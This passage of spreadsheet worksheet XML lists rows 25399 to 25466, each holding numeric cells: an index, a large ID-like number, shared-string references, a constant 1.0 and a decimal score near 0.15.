        <v>21405.0</v>
      </c>
      <c r="B25399" s="2">
        <v>2.1931592E7</v>
      </c>
      <c r="C25399" s="2" t="s">
        <v>24431</v>
      </c>
      <c r="D25399" s="2">
        <v>1.0</v>
      </c>
      <c r="E25399" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25399" s="2">
        <v>0.1580459770114943</v>
      </c>
    </row>
    <row r="25400" ht="15.75" customHeight="1">
      <c r="A25400" s="1">
        <v>21591.0</v>
      </c>
      <c r="B25400" s="2">
        <v>2.3962471E7</v>
      </c>
      <c r="C25400" s="2" t="s">
        <v>24432</v>
      </c>
      <c r="D25400" s="2">
        <v>1.0</v>
      </c>
      <c r="E25400" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25400" s="2">
        <v>0.1580459770114943</v>
      </c>
    </row>
    <row r="25401" ht="15.75" customHeight="1">
      <c r="A25401" s="1">
        <v>34222.0</v>
      </c>
      <c r="B25401" s="2">
        <v>4.5152891E7</v>
      </c>
      <c r="C25401" s="2" t="s">
        <v>24433</v>
      </c>
      <c r="D25401" s="2">
        <v>1.0</v>
      </c>
      <c r="E25401" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25401" s="2">
        <v>0.1580459770114943</v>
      </c>
    </row>
    <row r="25402" ht="15.75" customHeight="1">
      <c r="A25402" s="1">
        <v>711.0</v>
      </c>
      <c r="B25402" s="2">
        <v>2.0612975E7</v>
      </c>
      <c r="C25402" s="2" t="s">
        <v>24434</v>
      </c>
      <c r="D25402" s="2">
        <v>1.0</v>
      </c>
      <c r="E25402" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25402" s="2">
        <v>0.158008658008658</v>
      </c>
    </row>
    <row r="25403" ht="15.75" customHeight="1">
      <c r="A25403" s="1">
        <v>22323.0</v>
      </c>
      <c r="B25403" s="2">
        <v>3.4040435E7</v>
      </c>
      <c r="C25403" s="2" t="s">
        <v>24435</v>
      </c>
      <c r="D25403" s="2">
        <v>1.0</v>
      </c>
      <c r="E25403" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25403" s="2">
        <v>0.1572504708097929</v>
      </c>
    </row>
    <row r="25404" ht="15.75" customHeight="1">
      <c r="A25404" s="1">
        <v>32818.0</v>
      </c>
      <c r="B25404" s="2">
        <v>6212167.0</v>
      </c>
      <c r="C25404" s="2" t="s">
        <v>24436</v>
      </c>
      <c r="D25404" s="2">
        <v>1.0</v>
      </c>
      <c r="E25404" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25404" s="2">
        <v>0.1570048309178745</v>
      </c>
    </row>
    <row r="25405" ht="15.75" customHeight="1">
      <c r="A25405" s="1">
        <v>34202.0</v>
      </c>
      <c r="B25405" s="2">
        <v>1.5082173E7</v>
      </c>
      <c r="C25405" s="2" t="s">
        <v>24437</v>
      </c>
      <c r="D25405" s="2">
        <v>1.0</v>
      </c>
      <c r="E25405" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25405" s="2">
        <v>0.1568100358422939</v>
      </c>
    </row>
    <row r="25406" ht="15.75" customHeight="1">
      <c r="A25406" s="1">
        <v>21989.0</v>
      </c>
      <c r="B25406" s="2">
        <v>2.9445753E7</v>
      </c>
      <c r="C25406" s="2" t="s">
        <v>24438</v>
      </c>
      <c r="D25406" s="2">
        <v>1.0</v>
      </c>
      <c r="E25406" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25406" s="2">
        <v>0.1565656565656566</v>
      </c>
    </row>
    <row r="25407" ht="15.75" customHeight="1">
      <c r="A25407" s="1">
        <v>24059.0</v>
      </c>
      <c r="B25407" s="2">
        <v>9595618.0</v>
      </c>
      <c r="C25407" s="2" t="s">
        <v>24439</v>
      </c>
      <c r="D25407" s="2">
        <v>1.0</v>
      </c>
      <c r="E25407" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25407" s="2">
        <v>0.1561302681992338</v>
      </c>
    </row>
    <row r="25408" ht="15.75" customHeight="1">
      <c r="A25408" s="1">
        <v>20909.0</v>
      </c>
      <c r="B25408" s="2">
        <v>1.6282676E7</v>
      </c>
      <c r="C25408" s="2" t="s">
        <v>24440</v>
      </c>
      <c r="D25408" s="2">
        <v>1.0</v>
      </c>
      <c r="E25408" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25408" s="2">
        <v>0.1557539682539683</v>
      </c>
    </row>
    <row r="25409" ht="15.75" customHeight="1">
      <c r="A25409" s="1">
        <v>33762.0</v>
      </c>
      <c r="B25409" s="2">
        <v>8626254.0</v>
      </c>
      <c r="C25409" s="2" t="s">
        <v>24441</v>
      </c>
      <c r="D25409" s="2">
        <v>1.0</v>
      </c>
      <c r="E25409" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25409" s="2">
        <v>0.1557120500782473</v>
      </c>
    </row>
    <row r="25410" ht="15.75" customHeight="1">
      <c r="A25410" s="1">
        <v>20321.0</v>
      </c>
      <c r="B25410" s="2">
        <v>1.1478912E7</v>
      </c>
      <c r="C25410" s="2" t="s">
        <v>24442</v>
      </c>
      <c r="D25410" s="2">
        <v>1.0</v>
      </c>
      <c r="E25410" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25410" s="2">
        <v>0.1553672316384181</v>
      </c>
    </row>
    <row r="25411" ht="15.75" customHeight="1">
      <c r="A25411" s="1">
        <v>20563.0</v>
      </c>
      <c r="B25411" s="2">
        <v>1.3426835E7</v>
      </c>
      <c r="C25411" s="2" t="s">
        <v>24443</v>
      </c>
      <c r="D25411" s="2">
        <v>1.0</v>
      </c>
      <c r="E25411" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25411" s="2">
        <v>0.1553672316384181</v>
      </c>
    </row>
    <row r="25412" ht="15.75" customHeight="1">
      <c r="A25412" s="1">
        <v>24638.0</v>
      </c>
      <c r="B25412" s="2">
        <v>1.1478911E7</v>
      </c>
      <c r="C25412" s="2" t="s">
        <v>24442</v>
      </c>
      <c r="D25412" s="2">
        <v>1.0</v>
      </c>
      <c r="E25412" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25412" s="2">
        <v>0.1553672316384181</v>
      </c>
    </row>
    <row r="25413" ht="15.75" customHeight="1">
      <c r="A25413" s="1">
        <v>24868.0</v>
      </c>
      <c r="B25413" s="2">
        <v>1.2208325E7</v>
      </c>
      <c r="C25413" s="2" t="s">
        <v>24444</v>
      </c>
      <c r="D25413" s="2">
        <v>1.0</v>
      </c>
      <c r="E25413" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25413" s="2">
        <v>0.1553672316384181</v>
      </c>
    </row>
    <row r="25414" ht="15.75" customHeight="1">
      <c r="A25414" s="1">
        <v>25308.0</v>
      </c>
      <c r="B25414" s="2">
        <v>1.3426834E7</v>
      </c>
      <c r="C25414" s="2" t="s">
        <v>24443</v>
      </c>
      <c r="D25414" s="2">
        <v>1.0</v>
      </c>
      <c r="E25414" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25414" s="2">
        <v>0.1553672316384181</v>
      </c>
    </row>
    <row r="25415" ht="15.75" customHeight="1">
      <c r="A25415" s="1">
        <v>26344.0</v>
      </c>
      <c r="B25415" s="2">
        <v>1.677666E7</v>
      </c>
      <c r="C25415" s="2" t="s">
        <v>24445</v>
      </c>
      <c r="D25415" s="2">
        <v>1.0</v>
      </c>
      <c r="E25415" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25415" s="2">
        <v>0.1553672316384181</v>
      </c>
    </row>
    <row r="25416" ht="15.75" customHeight="1">
      <c r="A25416" s="1">
        <v>33149.0</v>
      </c>
      <c r="B25416" s="2">
        <v>7066480.0</v>
      </c>
      <c r="C25416" s="2" t="s">
        <v>24446</v>
      </c>
      <c r="D25416" s="2">
        <v>1.0</v>
      </c>
      <c r="E25416" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25416" s="2">
        <v>0.1553672316384181</v>
      </c>
    </row>
    <row r="25417" ht="15.75" customHeight="1">
      <c r="A25417" s="1">
        <v>33603.0</v>
      </c>
      <c r="B25417" s="2">
        <v>8340295.0</v>
      </c>
      <c r="C25417" s="2" t="s">
        <v>24447</v>
      </c>
      <c r="D25417" s="2">
        <v>1.0</v>
      </c>
      <c r="E25417" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25417" s="2">
        <v>0.1546296296296296</v>
      </c>
    </row>
    <row r="25418" ht="15.75" customHeight="1">
      <c r="A25418" s="1">
        <v>33573.0</v>
      </c>
      <c r="B25418" s="2">
        <v>8260769.0</v>
      </c>
      <c r="C25418" s="2" t="s">
        <v>24448</v>
      </c>
      <c r="D25418" s="2">
        <v>1.0</v>
      </c>
      <c r="E25418" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25418" s="2">
        <v>0.1544901065449011</v>
      </c>
    </row>
    <row r="25419" ht="15.75" customHeight="1">
      <c r="A25419" s="1">
        <v>712.0</v>
      </c>
      <c r="B25419" s="2">
        <v>2.0612975E7</v>
      </c>
      <c r="C25419" s="2" t="s">
        <v>24449</v>
      </c>
      <c r="D25419" s="2">
        <v>1.0</v>
      </c>
      <c r="E25419" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25419" s="2">
        <v>0.1544117647058824</v>
      </c>
    </row>
    <row r="25420" ht="15.75" customHeight="1">
      <c r="A25420" s="1">
        <v>27436.0</v>
      </c>
      <c r="B25420" s="2">
        <v>2.1931591E7</v>
      </c>
      <c r="C25420" s="2" t="s">
        <v>24431</v>
      </c>
      <c r="D25420" s="2">
        <v>1.0</v>
      </c>
      <c r="E25420" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25420" s="2">
        <v>0.1542145593869733</v>
      </c>
    </row>
    <row r="25421" ht="15.75" customHeight="1">
      <c r="A25421" s="1">
        <v>29912.0</v>
      </c>
      <c r="B25421" s="2">
        <v>3607050.0</v>
      </c>
      <c r="C25421" s="2" t="s">
        <v>24450</v>
      </c>
      <c r="D25421" s="2">
        <v>1.0</v>
      </c>
      <c r="E25421" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25421" s="2">
        <v>0.1541471048513302</v>
      </c>
    </row>
    <row r="25422" ht="15.75" customHeight="1">
      <c r="A25422" s="1">
        <v>23699.0</v>
      </c>
      <c r="B25422" s="2">
        <v>7082770.0</v>
      </c>
      <c r="C25422" s="2" t="s">
        <v>24451</v>
      </c>
      <c r="D25422" s="2">
        <v>1.0</v>
      </c>
      <c r="E25422" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25422" s="2">
        <v>0.1540404040404041</v>
      </c>
    </row>
    <row r="25423" ht="15.75" customHeight="1">
      <c r="A25423" s="1">
        <v>33911.0</v>
      </c>
      <c r="B25423" s="2">
        <v>9222961.0</v>
      </c>
      <c r="C25423" s="2" t="s">
        <v>24452</v>
      </c>
      <c r="D25423" s="2">
        <v>1.0</v>
      </c>
      <c r="E25423" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25423" s="2">
        <v>0.1540404040404041</v>
      </c>
    </row>
    <row r="25424" ht="15.75" customHeight="1">
      <c r="A25424" s="1">
        <v>23050.0</v>
      </c>
      <c r="B25424" s="2">
        <v>5023040.0</v>
      </c>
      <c r="C25424" s="2" t="s">
        <v>24453</v>
      </c>
      <c r="D25424" s="2">
        <v>1.0</v>
      </c>
      <c r="E25424" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25424" s="2">
        <v>0.1539162112932605</v>
      </c>
    </row>
    <row r="25425" ht="15.75" customHeight="1">
      <c r="A25425" s="1">
        <v>12963.0</v>
      </c>
      <c r="B25425" s="2">
        <v>3.2508194E7</v>
      </c>
      <c r="C25425" s="2" t="s">
        <v>24454</v>
      </c>
      <c r="D25425" s="2">
        <v>1.0</v>
      </c>
      <c r="E25425" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25425" s="2">
        <v>0.1534839924670434</v>
      </c>
    </row>
    <row r="25426" ht="15.75" customHeight="1">
      <c r="A25426" s="1">
        <v>6931.0</v>
      </c>
      <c r="B25426" s="2">
        <v>4.9878789E7</v>
      </c>
      <c r="C25426" s="2" t="s">
        <v>24455</v>
      </c>
      <c r="D25426" s="2">
        <v>1.0</v>
      </c>
      <c r="E25426" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25426" s="2">
        <v>0.1527777777777778</v>
      </c>
    </row>
    <row r="25427" ht="15.75" customHeight="1">
      <c r="A25427" s="1">
        <v>7092.0</v>
      </c>
      <c r="B25427" s="2">
        <v>5.0306117E7</v>
      </c>
      <c r="C25427" s="2" t="s">
        <v>24456</v>
      </c>
      <c r="D25427" s="2">
        <v>1.0</v>
      </c>
      <c r="E25427" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25427" s="2">
        <v>0.1527777777777778</v>
      </c>
    </row>
    <row r="25428" ht="15.75" customHeight="1">
      <c r="A25428" s="1">
        <v>15357.0</v>
      </c>
      <c r="B25428" s="2">
        <v>4.2695184E7</v>
      </c>
      <c r="C25428" s="2" t="s">
        <v>24457</v>
      </c>
      <c r="D25428" s="2">
        <v>1.0</v>
      </c>
      <c r="E25428" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25428" s="2">
        <v>0.1527777777777778</v>
      </c>
    </row>
    <row r="25429" ht="15.75" customHeight="1">
      <c r="A25429" s="1">
        <v>22298.0</v>
      </c>
      <c r="B25429" s="2">
        <v>3.3567933E7</v>
      </c>
      <c r="C25429" s="2" t="s">
        <v>24458</v>
      </c>
      <c r="D25429" s="2">
        <v>1.0</v>
      </c>
      <c r="E25429" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25429" s="2">
        <v>0.1527777777777778</v>
      </c>
    </row>
    <row r="25430" ht="15.75" customHeight="1">
      <c r="A25430" s="1">
        <v>29383.0</v>
      </c>
      <c r="B25430" s="2">
        <v>3.1847944E7</v>
      </c>
      <c r="C25430" s="2" t="s">
        <v>24459</v>
      </c>
      <c r="D25430" s="2">
        <v>1.0</v>
      </c>
      <c r="E25430" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25430" s="2">
        <v>0.152557319223986</v>
      </c>
    </row>
    <row r="25431" ht="15.75" customHeight="1">
      <c r="A25431" s="1">
        <v>25989.0</v>
      </c>
      <c r="B25431" s="2">
        <v>1.5330105E7</v>
      </c>
      <c r="C25431" s="2" t="s">
        <v>24460</v>
      </c>
      <c r="D25431" s="2">
        <v>1.0</v>
      </c>
      <c r="E25431" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25431" s="2">
        <v>0.152439024390244</v>
      </c>
    </row>
    <row r="25432" ht="15.75" customHeight="1">
      <c r="A25432" s="1">
        <v>22955.0</v>
      </c>
      <c r="B25432" s="2">
        <v>4903911.0</v>
      </c>
      <c r="C25432" s="2" t="s">
        <v>24451</v>
      </c>
      <c r="D25432" s="2">
        <v>1.0</v>
      </c>
      <c r="E25432" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25432" s="2">
        <v>0.1523569023569024</v>
      </c>
    </row>
    <row r="25433" ht="15.75" customHeight="1">
      <c r="A25433" s="1">
        <v>12164.0</v>
      </c>
      <c r="B25433" s="2">
        <v>2.7354056E7</v>
      </c>
      <c r="C25433" s="2" t="s">
        <v>24461</v>
      </c>
      <c r="D25433" s="2">
        <v>1.0</v>
      </c>
      <c r="E25433" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25433" s="2">
        <v>0.1522988505747127</v>
      </c>
    </row>
    <row r="25434" ht="15.75" customHeight="1">
      <c r="A25434" s="1">
        <v>34256.0</v>
      </c>
      <c r="B25434" s="2">
        <v>5.4991939E7</v>
      </c>
      <c r="C25434" s="2" t="s">
        <v>24462</v>
      </c>
      <c r="D25434" s="2">
        <v>1.0</v>
      </c>
      <c r="E25434" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25434" s="2">
        <v>0.1520061728395062</v>
      </c>
    </row>
    <row r="25435" ht="15.75" customHeight="1">
      <c r="A25435" s="1">
        <v>13585.0</v>
      </c>
      <c r="B25435" s="2">
        <v>3.5728209E7</v>
      </c>
      <c r="C25435" s="2" t="s">
        <v>24463</v>
      </c>
      <c r="D25435" s="2">
        <v>1.0</v>
      </c>
      <c r="E25435" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25435" s="2">
        <v>0.1517857142857144</v>
      </c>
    </row>
    <row r="25436" ht="15.75" customHeight="1">
      <c r="A25436" s="1">
        <v>24867.0</v>
      </c>
      <c r="B25436" s="2">
        <v>1.2208325E7</v>
      </c>
      <c r="C25436" s="2" t="s">
        <v>24464</v>
      </c>
      <c r="D25436" s="2">
        <v>1.0</v>
      </c>
      <c r="E25436" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25436" s="2">
        <v>0.1517412935323384</v>
      </c>
    </row>
    <row r="25437" ht="15.75" customHeight="1">
      <c r="A25437" s="1">
        <v>21965.0</v>
      </c>
      <c r="B25437" s="2">
        <v>2.9066509E7</v>
      </c>
      <c r="C25437" s="2" t="s">
        <v>24465</v>
      </c>
      <c r="D25437" s="2">
        <v>1.0</v>
      </c>
      <c r="E25437" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25437" s="2">
        <v>0.1512345679012346</v>
      </c>
    </row>
    <row r="25438" ht="15.75" customHeight="1">
      <c r="A25438" s="1">
        <v>27598.0</v>
      </c>
      <c r="B25438" s="2">
        <v>2.2576848E7</v>
      </c>
      <c r="C25438" s="2" t="s">
        <v>24466</v>
      </c>
      <c r="D25438" s="2">
        <v>1.0</v>
      </c>
      <c r="E25438" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25438" s="2">
        <v>0.1512345679012346</v>
      </c>
    </row>
    <row r="25439" ht="15.75" customHeight="1">
      <c r="A25439" s="1">
        <v>31032.0</v>
      </c>
      <c r="B25439" s="2">
        <v>4.7806661E7</v>
      </c>
      <c r="C25439" s="2" t="s">
        <v>24467</v>
      </c>
      <c r="D25439" s="2">
        <v>1.0</v>
      </c>
      <c r="E25439" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25439" s="2">
        <v>0.1511437908496733</v>
      </c>
    </row>
    <row r="25440" ht="15.75" customHeight="1">
      <c r="A25440" s="1">
        <v>21462.0</v>
      </c>
      <c r="B25440" s="2">
        <v>2.2728227E7</v>
      </c>
      <c r="C25440" s="2" t="s">
        <v>24468</v>
      </c>
      <c r="D25440" s="2">
        <v>1.0</v>
      </c>
      <c r="E25440" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25440" s="2">
        <v>0.1510721247563354</v>
      </c>
    </row>
    <row r="25441" ht="15.75" customHeight="1">
      <c r="A25441" s="1">
        <v>20381.0</v>
      </c>
      <c r="B25441" s="2">
        <v>1.1913289E7</v>
      </c>
      <c r="C25441" s="2" t="s">
        <v>24469</v>
      </c>
      <c r="D25441" s="2">
        <v>1.0</v>
      </c>
      <c r="E25441" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25441" s="2">
        <v>0.1510721247563353</v>
      </c>
    </row>
    <row r="25442" ht="15.75" customHeight="1">
      <c r="A25442" s="1">
        <v>23854.0</v>
      </c>
      <c r="B25442" s="2">
        <v>8246211.0</v>
      </c>
      <c r="C25442" s="2" t="s">
        <v>24470</v>
      </c>
      <c r="D25442" s="2">
        <v>1.0</v>
      </c>
      <c r="E25442" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25442" s="2">
        <v>0.1510721247563353</v>
      </c>
    </row>
    <row r="25443" ht="15.75" customHeight="1">
      <c r="A25443" s="1">
        <v>17611.0</v>
      </c>
      <c r="B25443" s="2">
        <v>5.0360815E7</v>
      </c>
      <c r="C25443" s="2" t="s">
        <v>24471</v>
      </c>
      <c r="D25443" s="2">
        <v>1.0</v>
      </c>
      <c r="E25443" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25443" s="2">
        <v>0.150925925925926</v>
      </c>
    </row>
    <row r="25444" ht="15.75" customHeight="1">
      <c r="A25444" s="1">
        <v>28353.0</v>
      </c>
      <c r="B25444" s="2">
        <v>2.595724E7</v>
      </c>
      <c r="C25444" s="2" t="s">
        <v>24472</v>
      </c>
      <c r="D25444" s="2">
        <v>1.0</v>
      </c>
      <c r="E25444" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25444" s="2">
        <v>0.1509259259259259</v>
      </c>
    </row>
    <row r="25445" ht="15.75" customHeight="1">
      <c r="A25445" s="1">
        <v>25400.0</v>
      </c>
      <c r="B25445" s="2">
        <v>1.375491E7</v>
      </c>
      <c r="C25445" s="2" t="s">
        <v>24473</v>
      </c>
      <c r="D25445" s="2">
        <v>1.0</v>
      </c>
      <c r="E25445" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25445" s="2">
        <v>0.1509009009009009</v>
      </c>
    </row>
    <row r="25446" ht="15.75" customHeight="1">
      <c r="A25446" s="1">
        <v>2389.0</v>
      </c>
      <c r="B25446" s="2">
        <v>3.3343273E7</v>
      </c>
      <c r="C25446" s="2" t="s">
        <v>24474</v>
      </c>
      <c r="D25446" s="2">
        <v>1.0</v>
      </c>
      <c r="E25446" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25446" s="2">
        <v>0.1502732240437159</v>
      </c>
    </row>
    <row r="25447" ht="15.75" customHeight="1">
      <c r="A25447" s="1">
        <v>3488.0</v>
      </c>
      <c r="B25447" s="2">
        <v>3.8420791E7</v>
      </c>
      <c r="C25447" s="2" t="s">
        <v>24475</v>
      </c>
      <c r="D25447" s="2">
        <v>1.0</v>
      </c>
      <c r="E25447" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25447" s="2">
        <v>0.1502732240437159</v>
      </c>
    </row>
    <row r="25448" ht="15.75" customHeight="1">
      <c r="A25448" s="1">
        <v>17574.0</v>
      </c>
      <c r="B25448" s="2">
        <v>5.026392E7</v>
      </c>
      <c r="C25448" s="2" t="s">
        <v>24476</v>
      </c>
      <c r="D25448" s="2">
        <v>1.0</v>
      </c>
      <c r="E25448" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25448" s="2">
        <v>0.1502732240437159</v>
      </c>
    </row>
    <row r="25449" ht="15.75" customHeight="1">
      <c r="A25449" s="1">
        <v>23520.0</v>
      </c>
      <c r="B25449" s="2">
        <v>5857362.0</v>
      </c>
      <c r="C25449" s="2" t="s">
        <v>24477</v>
      </c>
      <c r="D25449" s="2">
        <v>1.0</v>
      </c>
      <c r="E25449" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25449" s="2">
        <v>0.1502732240437159</v>
      </c>
    </row>
    <row r="25450" ht="15.75" customHeight="1">
      <c r="A25450" s="1">
        <v>27962.0</v>
      </c>
      <c r="B25450" s="2">
        <v>2.3928196E7</v>
      </c>
      <c r="C25450" s="2" t="s">
        <v>24478</v>
      </c>
      <c r="D25450" s="2">
        <v>1.0</v>
      </c>
      <c r="E25450" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25450" s="2">
        <v>0.1502732240437159</v>
      </c>
    </row>
    <row r="25451" ht="15.75" customHeight="1">
      <c r="A25451" s="1">
        <v>29199.0</v>
      </c>
      <c r="B25451" s="2">
        <v>3.0766178E7</v>
      </c>
      <c r="C25451" s="2" t="s">
        <v>24479</v>
      </c>
      <c r="D25451" s="2">
        <v>1.0</v>
      </c>
      <c r="E25451" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25451" s="2">
        <v>0.1502732240437159</v>
      </c>
    </row>
    <row r="25452" ht="15.75" customHeight="1">
      <c r="A25452" s="1">
        <v>32569.0</v>
      </c>
      <c r="B25452" s="2">
        <v>5769097.0</v>
      </c>
      <c r="C25452" s="2" t="s">
        <v>24480</v>
      </c>
      <c r="D25452" s="2">
        <v>1.0</v>
      </c>
      <c r="E25452" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25452" s="2">
        <v>0.1500829187396352</v>
      </c>
    </row>
    <row r="25453" ht="15.75" customHeight="1">
      <c r="A25453" s="1">
        <v>29522.0</v>
      </c>
      <c r="B25453" s="2">
        <v>3.2777872E7</v>
      </c>
      <c r="C25453" s="2" t="s">
        <v>24481</v>
      </c>
      <c r="D25453" s="2">
        <v>1.0</v>
      </c>
      <c r="E25453" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25453" s="2">
        <v>0.1498015873015874</v>
      </c>
    </row>
    <row r="25454" ht="15.75" customHeight="1">
      <c r="A25454" s="1">
        <v>34055.0</v>
      </c>
      <c r="B25454" s="2">
        <v>9595617.0</v>
      </c>
      <c r="C25454" s="2" t="s">
        <v>24482</v>
      </c>
      <c r="D25454" s="2">
        <v>1.0</v>
      </c>
      <c r="E25454" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25454" s="2">
        <v>0.1498015873015874</v>
      </c>
    </row>
    <row r="25455" ht="15.75" customHeight="1">
      <c r="A25455" s="1">
        <v>32593.0</v>
      </c>
      <c r="B25455" s="2">
        <v>5802568.0</v>
      </c>
      <c r="C25455" s="2" t="s">
        <v>24483</v>
      </c>
      <c r="D25455" s="2">
        <v>1.0</v>
      </c>
      <c r="E25455" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25455" s="2">
        <v>0.1497175141242938</v>
      </c>
    </row>
    <row r="25456" ht="15.75" customHeight="1">
      <c r="A25456" s="1">
        <v>33794.0</v>
      </c>
      <c r="B25456" s="2">
        <v>8774766.0</v>
      </c>
      <c r="C25456" s="2" t="s">
        <v>24484</v>
      </c>
      <c r="D25456" s="2">
        <v>1.0</v>
      </c>
      <c r="E25456" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25456" s="2">
        <v>0.1497175141242938</v>
      </c>
    </row>
    <row r="25457" ht="15.75" customHeight="1">
      <c r="A25457" s="1">
        <v>22098.0</v>
      </c>
      <c r="B25457" s="2">
        <v>3.0816268E7</v>
      </c>
      <c r="C25457" s="2" t="s">
        <v>24485</v>
      </c>
      <c r="D25457" s="2">
        <v>1.0</v>
      </c>
      <c r="E25457" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25457" s="2">
        <v>0.149641577060932</v>
      </c>
    </row>
    <row r="25458" ht="15.75" customHeight="1">
      <c r="A25458" s="1">
        <v>28204.0</v>
      </c>
      <c r="B25458" s="2">
        <v>2.5016994E7</v>
      </c>
      <c r="C25458" s="2" t="s">
        <v>24486</v>
      </c>
      <c r="D25458" s="2">
        <v>1.0</v>
      </c>
      <c r="E25458" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25458" s="2">
        <v>0.1495726495726496</v>
      </c>
    </row>
    <row r="25459" ht="15.75" customHeight="1">
      <c r="A25459" s="1">
        <v>31855.0</v>
      </c>
      <c r="B25459" s="2">
        <v>5277105.0</v>
      </c>
      <c r="C25459" s="2" t="s">
        <v>24487</v>
      </c>
      <c r="D25459" s="2">
        <v>1.0</v>
      </c>
      <c r="E25459" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25459" s="2">
        <v>0.1495098039215687</v>
      </c>
    </row>
    <row r="25460" ht="15.75" customHeight="1">
      <c r="A25460" s="1">
        <v>34023.0</v>
      </c>
      <c r="B25460" s="2">
        <v>9514484.0</v>
      </c>
      <c r="C25460" s="2" t="s">
        <v>24488</v>
      </c>
      <c r="D25460" s="2">
        <v>1.0</v>
      </c>
      <c r="E25460" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25460" s="2">
        <v>0.1490299823633157</v>
      </c>
    </row>
    <row r="25461" ht="15.75" customHeight="1">
      <c r="A25461" s="1">
        <v>31221.0</v>
      </c>
      <c r="B25461" s="2">
        <v>4926400.0</v>
      </c>
      <c r="C25461" s="2" t="s">
        <v>24489</v>
      </c>
      <c r="D25461" s="2">
        <v>1.0</v>
      </c>
      <c r="E25461" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25461" s="2">
        <v>0.1488888888888889</v>
      </c>
    </row>
    <row r="25462" ht="15.75" customHeight="1">
      <c r="A25462" s="1">
        <v>31333.0</v>
      </c>
      <c r="B25462" s="2">
        <v>4.9757024E7</v>
      </c>
      <c r="C25462" s="2" t="s">
        <v>24490</v>
      </c>
      <c r="D25462" s="2">
        <v>1.0</v>
      </c>
      <c r="E25462" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25462" s="2">
        <v>0.1488603988603989</v>
      </c>
    </row>
    <row r="25463" ht="15.75" customHeight="1">
      <c r="A25463" s="1">
        <v>2666.0</v>
      </c>
      <c r="B25463" s="2">
        <v>3.4727331E7</v>
      </c>
      <c r="C25463" s="2" t="s">
        <v>24491</v>
      </c>
      <c r="D25463" s="2">
        <v>1.0</v>
      </c>
      <c r="E25463" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25463" s="2">
        <v>0.1484848484848485</v>
      </c>
    </row>
    <row r="25464" ht="15.75" customHeight="1">
      <c r="A25464" s="1">
        <v>21171.0</v>
      </c>
      <c r="B25464" s="2">
        <v>1.9029554E7</v>
      </c>
      <c r="C25464" s="2" t="s">
        <v>24492</v>
      </c>
      <c r="D25464" s="2">
        <v>1.0</v>
      </c>
      <c r="E25464" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25464" s="2">
        <v>0.1484848484848485</v>
      </c>
    </row>
    <row r="25465" ht="15.75" customHeight="1">
      <c r="A25465" s="1">
        <v>21645.0</v>
      </c>
      <c r="B25465" s="2">
        <v>2.4795067E7</v>
      </c>
      <c r="C25465" s="2" t="s">
        <v>24493</v>
      </c>
      <c r="D25465" s="2">
        <v>1.0</v>
      </c>
      <c r="E25465" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25465" s="2">
        <v>0.1484848484848485</v>
      </c>
    </row>
    <row r="25466" ht="15.75" customHeight="1">
      <c r="A25466" s="1">
        <v>22563.0</v>
      </c>
      <c r="B25466" s="2">
